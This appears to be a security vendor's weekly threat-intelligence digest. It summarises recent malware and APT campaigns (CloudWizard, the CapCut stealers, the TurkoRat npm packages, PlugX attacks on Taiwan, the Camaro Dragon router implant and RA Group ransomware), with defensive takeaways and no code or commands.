CloudWizard APT: the Bad Magic Story Goes on
Background:
A newly-discovered modular malware framework dubbed CloudWizard has been active since 2016. Kaspersky researchers were able to connect it to previously-recorded advanced persistent threat activities: Operation Groundbait and the Prikormka malware (2008-2016), Operation BugDrop (2017), PowerMagic (2020-2022) and CommonMagic (2022). Similar to these previous campaigns, CloudWizard targets individuals, diplomatic organizations, and research organizations in the Donetsk, Lugansk, Crimea, Central and Western Ukraine regions. CloudWizard’s two main modules perform encryption and decryption of all communications and relay the encrypted data to the cloud or web-based C2. Additional modules enable taking screenshots, microphone recording, keylogging and more.
Takeaway:
Earlier, ESET researchers concluded that the actors behind Operation Groundbait most likely operate from within Ukraine, but Kaspersky researchers did not share if they agree with this attribution. Wars and military conflicts attract additional cyber activity.
CapCut Users Under Fire
Background:
Several campaigns are targeting users of the CapCut video editing software with typosquatted websites. Users in jurisdictions where this popular product of ByteDance is banned (Taiwan, India, and several other countries) are especially vulnerable. One campaign profiled by Cyble researchers delivers the Offx stealer. Another campaign delivers BatLoader eventually leading to RedLine Stealer and an Antimalware Scan Interface (AMSI) bypass tool. It had not been detected by any antivirus engine at the time of discovery.
Takeaway:
Users should avoid downloading pirated software from unofficial websites.
Learn about our Penetration Testing Services
RATs Found Hiding in the npm Attic
Background:
Malicious packages at the npm public repository were staying undetected for up to two months. The attackers used name typosquatting and impersonation of popular, legitimate packages, used their code, and included links to the legitimate GitHub repositories. ReversingLabs researchers determined that this campaign was aiming at delivering a modified version of the open-source TurkoRat infostealer. It was used to steal user information and crypto wallets.
Takeaway:
Development organizations should take steps to avoid typing mistakes for dependencies, scrutinize the features and behaviors of the code they are relying on. Organizations should pay attention to suspicious combinations of code behavior such as discrepancies in naming, executing commands, hard-coded IP addresses, smaller than expected downloads, suspicious versioning, and writing data to files.
China-Taiwan Tensions Spark Surge in Cyberattacks on Taiwan
Background:
In April 2023, rising geopolitical tensions between China and Taiwan resulted in an increase in cyber-attacks towards Taiwan, with malicious emails and phishing URLs. PlugX and other malware detections were identified by Trellix researchers. The malicious emails targeted various industries, with the most impacted industries being networking/IT, manufacturing, and logistics. The phishing URLs were found to be generic login pages, targeted company-specific pages, and multi-brand login pages, with the goal of harvesting credentials. Three days after the phishing email volume peaked, the PlugX RAT detections spiked, with sightings of other malware families such as Formbook, Kryptik, and Zmutzy.
Takeaway:
All employees should be educated on the risks of phishing, specifically, how to identify such attempts and whom to contact if a phishing attack is identified. Unwarranted emails that request that the recipient follow a link and enter the credentials can be indicative of a phishing attack.
The Dragon Who Sold His Camaro: Analyzing Custom Router Implant
Background:
Check Point researchers have recently discovered a malicious firmware implant tailored for TP-Link routers. This implant is associated with a China-sponsored group known as Camaro Dragon, and is similar to previously-reported activities conducted by the Mustang Panda group. The actors trojanized TP-Link firmware images by modifying two files and adding four files to the altered router firmware. The implant contains several malicious components, including a custom backdoor, dubbed Horse Shell, that enables remote shell, file transfer, and network tunneling, making it easier for them to anonymize their communication through a chain of infected nodes.
Takeaway:
While the exact intrusion technique is not known, it is important to keep your network devices patched to the latest security update.
Newly Identified RA Group Compromises Companies in U.S. and South Korea with Leaked Babuk Source Code
Background:
RA Group is a new ransomware group that has been actively exposing target data since April 2023. The group uses double-extortion tactics. Talos researchers established that Ra Group’s ransomware is based on the leaked Babuk ransomware source code. The ransomware code appears to include the target’s name and is written in C++, and uses the cryptography scheme with curve25519 and eSTREAM cipher hc-128 algorithm for encryption. The group’s first exposed targets were organizations in the US and South Korea.
Takeaway:
Ransomware is a constantly evolving threat, and the most fundamental defense is having proper backup and restore processes in place that allows recovery without any need to decrypt the affected data. Data theft is containable through segmentation, encrypting data at rest, and limiting the storage of personal and sensitive data.
Learn about our Penetration Testing Services
Subscribe So You Never Miss an Update
